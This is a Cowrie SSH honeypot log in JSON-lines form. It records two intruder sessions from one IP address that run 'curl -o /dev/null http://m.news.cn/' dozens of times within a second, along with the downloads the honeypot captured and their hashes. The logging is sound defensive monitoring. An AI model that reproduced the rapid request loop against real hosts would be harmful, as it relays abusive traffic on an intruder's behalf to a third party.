{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.839272Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.871955Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.873032Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.876710Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.877607Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.915313Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.916326Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.919172Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.920110Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.955791Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.956904Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:45.974986Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:45.976534Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.010144Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.017453Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.018654Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.024705Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.027466Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.028968Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.035231Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.041778Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.052980Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.059753Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.069603Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.115157Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.116201Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.120221Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.121424Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.150744Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.154639Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.155742Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.158499Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.159408Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.185864Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.199146Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.200405Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.203878Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.205753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.206524Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.238060Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.239324Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.244613Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.245287Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.278708Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.280889Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.281900Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.284616Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.285472Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.320044Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.321158Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.327834Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.328781Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.359581Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.362254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.363427Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.368428Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.371279Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.372281Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.383667Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.398812Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.400046Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.408482Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.410026Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.419867Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.437282Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.438542Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.443429Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.447430Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.448457Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.475457Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.476498Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.487821Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.488777Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.512318Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.513441Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.522587Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.527115Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.528262Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.548059Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.549387Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.566353Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.567371Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.585932Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.586886Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.591064Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.593591Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.605154Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.606215Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.610622Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.624842Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.625808Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.643335Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.644392Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.645151Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:46.659714Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:46.660830Z","src_ip":"212.227.125.160","session":"7541ed730449"}
